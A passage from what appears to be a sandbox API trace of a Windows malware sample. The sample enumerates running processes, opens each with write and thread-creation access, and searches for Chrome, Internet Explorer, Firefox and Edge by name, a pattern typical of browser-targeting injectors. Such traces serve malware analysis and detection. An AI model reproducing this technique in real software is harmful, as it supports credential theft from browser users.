	[0204.826] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.827] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2a1c
	[0204.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.827] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.827] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.827] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.828] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.828] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.829] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2a20
	[0204.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.829] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.829] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.829] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.830] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.830] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.830] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2a24
	[0204.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.831] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.831] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.831] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.832] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.832] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0204.833] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2a28
	[0204.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.833] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0204.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.833] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.834] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0204.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.834] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.834] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.835] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2a2c
	[0204.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.835] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.835] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.835] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.836] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.836] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0204.837] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x2a30
	[0204.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.837] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.837] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.837] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.838] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.838] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0204.839] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2a34
	[0204.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.839] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0204.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.839] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.839] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0204.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.840] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.840] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.841] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2a38
	[0204.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.841] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.841] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.841] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.842] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.842] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0204.842] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2a3c
	[0204.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.843] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0204.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.843] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.843] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0204.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.844] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.844] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0204.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2a40
	[0204.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.847] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0204.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.848] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.848] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0204.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.848] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.849] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0204.849] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2a44
	[0204.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.849] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0204.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.850] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.850] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0204.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.850] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.850] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0204.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2a48
	[0204.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.851] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0204.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.851] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.852] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0204.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.852] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.852] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0204.853] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0204.853] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0204.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2a4c
	[0204.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.854] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0204.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.854] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.855] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0204.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.855] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.856] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0204.857] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2a50
	[0204.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.857] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0204.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.857] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.858] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0204.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.858] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.858] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0204.859] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2a54
	[0204.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.859] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0204.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.860] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.860] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0204.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.861] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.861] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0204.862] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2a58
	[0204.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.862] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0204.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.863] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.863] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0204.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.863] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.864] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0204.865] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2a5c
	[0204.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.865] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0204.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.866] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.866] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0204.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.867] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.867] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0204.868] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2a60
	[0204.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.868] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0204.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.868] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.869] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0204.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.869] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.869] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0204.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2a64
	[0204.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.870] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0204.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.871] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.871] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0204.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.871] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.872] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0204.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x2a68
	[0204.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.873] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0204.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.873] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.873] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0204.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.874] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.874] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0204.875] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2a6c
	[0204.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.875] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0204.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.876] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.876] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0204.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.876] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.876] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0204.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2a70
	[0204.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.877] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0204.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.877] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.878] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0204.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.878] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.878] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0204.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2a74
	[0204.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.879] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0204.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.879] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.880] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0204.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.880] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.880] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0204.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x2a78
	[0204.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.881] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0204.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.882] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.883] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0204.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.883] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.884] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0204.885] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2a7c
	[0204.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
